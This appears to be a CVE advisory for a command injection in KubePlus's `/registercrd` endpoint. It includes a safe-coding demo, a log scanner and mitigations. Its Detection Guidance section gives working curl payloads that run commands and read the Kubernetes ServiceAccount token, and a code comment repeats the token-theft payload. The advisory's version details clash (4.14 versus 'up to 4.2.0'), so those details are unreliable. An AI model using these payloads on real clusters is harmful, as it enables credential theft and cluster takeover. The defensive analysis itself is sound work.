CVE-2026-29955
Status: Received - Intake
Command Injection in KubePlus kubeconfiggenerator via Unsanitized Input

Publication date: 2026-04-13

Last updated on: 2026-05-01

Assigner: MITRE

Description
The `/registercrd` endpoint in KubePlus 4.14 in the kubeconfiggenerator component is vulnerable to command injection. The component uses `subprocess.Popen()` with the `shell=True` parameter to execute shell commands, and the user-supplied `chartName` parameter is directly concatenated into the command string without any sanitization or validation. An attacker can inject arbitrary shell commands by crafting a malicious `chartName` parameter value.
Meta Information
Generated: 2026-06-16
AI Q&A: 2026-04-13
EPSS Evaluated: 2026-06-15
Affected Vendors & Products (1 associated CPE)
Vendor: cloudark
Product: kubeplus
Version / Range: up to 4.2.0 (inclusive)
CWE
CWE-94: The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
Executive Summary

CVE-2026-29955 is a critical command injection vulnerability in the kubeconfiggenerator component of KubePlus (version 4.2.0 and earlier). It exists in the `/registercrd` HTTP endpoint where the `chartName` parameter is directly concatenated into shell commands executed with Python's subprocess.Popen() using `shell=True` without any sanitization or validation.

Because the string is handed to `/bin/sh`, anything the shell treats as syntax works as an injection vector: command substitution such as `$(command)` or backticks, separators such as `;`, `&&` and `|`, and redirections such as `>`. An attacker only needs to place one of these in the `chartName` value.

This allows remote attackers with network access to the HTTP interface to execute arbitrary commands as root inside the container running kubeconfiggenerator.
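The pattern the summary describes, shown beside two safer variants, as an added example that is not KubePlus code and does not reproduce the real handler: the command template (`echo ...`), the function names, the chart-name pattern and the sample inputs are assumptions chosen so the demonstration runs harmlessly offline.

```python
# Added example (not KubePlus code): the string-concatenation + shell=True
# pattern the advisory describes for /registercrd, next to two safer variants.
# The "echo" command template, function names and sample chart names are
# assumptions so the demo runs harmlessly offline; the real handler's command
# is not reproduced here.
import re
import subprocess

# Assumption: chart names follow the DNS-label style Helm expects (lowercase
# alphanumerics and hyphens). Anything else is rejected before any command runs.
CHART_NAME_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")

# Constructed sample inputs: a benign chart name and a payload in the style the
# advisory describes ($(command) substitution). A real attacker would use e.g.
# $(cat /var/run/secrets/kubernetes.io/serviceaccount/token>/tmp/t) instead.
BENIGN_CHART = "my-chart"
PAYLOAD_CHART = "$(echo INJECTED)"


def chart_name_is_valid(chart_name: str) -> bool:
    """Allow-list check used by the hardened handler."""
    return CHART_NAME_RE.fullmatch(chart_name) is not None


def register_crd_vulnerable(chart_name: str) -> str:
    """String concatenation + shell=True: /bin/sh parses chart_name, so $(...),
    backticks, ';', '|' and '>' inside it become shell syntax."""
    cmd = "echo registering chart " + chart_name
    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, text=True)
    out, _ = proc.communicate()
    return out.strip()


def register_crd_argv(chart_name: str) -> str:
    """Same command without a shell: argv elements go to execve() as-is, so the
    payload arrives as one literal argument and nothing is substituted."""
    proc = subprocess.run(["echo", "registering", "chart", chart_name],
                          capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def register_crd_hardened(chart_name: str) -> str:
    """Defence in depth: validate against the allow-list first, then run without
    a shell. Rejecting bad input early also keeps junk out of any path such as
    /charts/<chartName> that the command may build."""
    if not chart_name_is_valid(chart_name):
        raise ValueError(f"invalid chartName: {chart_name!r}")
    return register_crd_argv(chart_name)


if __name__ == "__main__":
    print(register_crd_vulnerable(PAYLOAD_CHART))  # the shell ran the payload
    print(register_crd_argv(PAYLOAD_CHART))        # payload echoed literally
    try:
        register_crd_hardened(PAYLOAD_CHART)
    except ValueError as err:
        print("rejected:", err)
```

With the payload, the vulnerable function prints `registering chart INJECTED` (the substitution ran), the argv-only function prints the literal `$(echo INJECTED)`, and the hardened function refuses the value before anything executes. Dropping `shell=True` removes the injection; the allow-list is the second layer that also protects any file path built from the name.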

Impact Analysis

This vulnerability can have severe impacts including:

  • Remote Code Execution (RCE) allowing arbitrary commands to be run as root inside the container.
  • Theft of sensitive credentials such as Kubernetes cluster-admin ServiceAccount tokens.
  • Full cluster takeover by using stolen tokens to access and control the Kubernetes API with cluster-admin privileges.
  • Lateral movement across all namespaces and resources within the Kubernetes cluster.
Detection Guidance

Exploitation leaves two kinds of traces. If the kubeconfiggenerator container, or an ingress or proxy in front of it, logs incoming requests, look for requests to `/registercrd` whose `chartName` value contains shell metacharacters after percent-decoding: `$(`, backticks, `;`, `|`, `&&`, or redirections such as `>`. At runtime, look for unexpected child processes of the kubeconfiggenerator Python process (for example `cat`, `curl`, or a shell spawned to read the ServiceAccount token); a container runtime security tool can alert on these.

You can also confirm exploitability directly by sending a crafted request to `/registercrd` with a `chartName` that runs a harmless command, such as writing a file inside the container. These requests exploit the flaw, so run them only against an instance you are authorized to test. The examples assume the service is reachable on `localhost:5005` (for instance through `kubectl port-forward`); single quotes keep your own shell from expanding `$(...)`, and `-G --data-urlencode` percent-encodes the payload so that spaces and `&` inside it survive the URL.

  • Example: run `id` inside the container and write its output to `/tmp/pwned.txt`: curl -s -G 'http://localhost:5005/registercrd?kind=Test&version=v1&group=test.io&plural=tests&chartURL=https://example.com/test.tgz' --data-urlencode 'chartName=$(id>/tmp/pwned.txt)'
  • Verify execution by checking for `/tmp/pwned.txt` inside the container (for example with `kubectl exec` into the kubeconfiggenerator container).
  • Example: check whether the ServiceAccount token can be read: curl -s -G 'http://localhost:5005/registercrd?kind=Test2&version=v1&group=test2.io&plural=test2s&chartURL=https://example.com/test.tgz' --data-urlencode 'chartName=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token>/tmp/stolen-token.txt)'
  • Then verify that `/tmp/stolen-token.txt` inside the container contains the token, and delete both test files afterwards.
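A scanner for the request-log trace described above, as an added example that is not part of the advisory or of KubePlus: the Common Log Format layout of the lines and the sample entries themselves are constructed assumptions, so adjust `REQ_RE` to whatever your ingress, proxy or the service itself actually emits.

```python
# Added example (not from the advisory or from KubePlus): scan request logs for
# /registercrd calls whose chartName carries shell metacharacters. The Common
# Log Format layout and the sample lines below are constructed assumptions.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Characters that let /bin/sh change the meaning of a concatenated command:
# substitution ($, backtick, parentheses), separators (; | & newline), redirects.
SHELL_META = re.compile(r"[$`();|&<>\n]")

# CLF line: client ident user [timestamp] "METHOD target PROTO" status size
REQ_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: a benign registration, a probe that writes `id` output
# to /tmp, an unrelated request, and an attempt to read the ServiceAccount token.
SAMPLE_LOG = """\
10.0.3.7 - - [13/Apr/2026:10:12:01 +0000] "GET /registercrd?kind=Test&version=v1&group=test.io&plural=tests&chartURL=https://example.com/test.tgz&chartName=my-chart HTTP/1.1" 200 12
10.0.3.9 - - [13/Apr/2026:10:12:44 +0000] "GET /registercrd?kind=Test&version=v1&group=test.io&plural=tests&chartURL=https://example.com/test.tgz&chartName=%24%28id%3E%2Ftmp%2Fpwned.txt%29 HTTP/1.1" 200 12
10.0.3.9 - - [13/Apr/2026:10:13:02 +0000] "GET /healthz HTTP/1.1" 200 2
10.0.3.9 - - [13/Apr/2026:10:13:30 +0000] "GET /registercrd?kind=Test2&version=v1&group=test2.io&plural=test2s&chartURL=https://example.com/test.tgz&chartName=%24%28cat%20%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken%3E%2Ftmp%2Fstolen-token.txt%29 HTTP/1.1" 200 12
"""


def find_injection_attempts(log_text: str) -> list:
    """Return one record per request to /registercrd whose chartName contains
    shell metacharacters after percent-decoding. The value is decoded a second
    time so a double-encoded payload (e.g. %2524%2528) is caught as well."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != "/registercrd":
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("chartName", []):
            decoded = unquote(value)  # parse_qs already decoded once
            if SHELL_META.search(decoded):
                hits.append({"src": m.group("src"), "ts": m.group("ts"),
                             "chartName": decoded})
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} chartName={hit['chartName']!r}")
```

On the sample log this flags the two requests from 10.0.3.9 and ignores the benign `my-chart` registration and the `/healthz` call. Matching on the decoded value matters: the payloads arrive percent-encoded, so a pattern applied to the raw line would miss `%24%28`.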
Mitigation Strategies

Since no official patch is currently available, immediate mitigation consists of limiting who can reach the vulnerable kubeconfighelper service and limiting what its ServiceAccount can do if the service is compromised.

  • Use a Kubernetes NetworkPolicy to restrict ingress to the kubeconfighelper HTTP service (default port 5005) to the trusted sources that actually need it.
  • Reduce the privileges of the `kubeplus-saas-provider` ServiceAccount; in particular, avoid binding it to cluster-admin, since the token mounted in the container is what an attacker would steal.
  • Monitor request logs and the kubeconfiggenerator container for suspicious `chartName` values and unexpected child processes that may indicate exploitation attempts.
  • The durable fix is in the code: stop passing a concatenated string to `subprocess.Popen()` with `shell=True`, pass the command as an argument list instead, and validate `chartName` against the allowed chart-name character set before using it.
Compliance Impact

The CVE-2026-29955 vulnerability enables attackers to execute arbitrary commands as root inside the kubeconfiggenerator container and steal cluster-admin ServiceAccount tokens, leading to full control over the Kubernetes cluster.

This level of unauthorized access and control can result in exposure, modification, or deletion of sensitive data stored or processed within the cluster.

Such data breaches and unauthorized access can violate compliance requirements of common standards and regulations like GDPR and HIPAA, which mandate strict controls over data confidentiality, integrity, and access.

Therefore, exploitation of this vulnerability could lead to non-compliance with these regulations due to potential data breaches, unauthorized data access, and lack of adequate security controls.
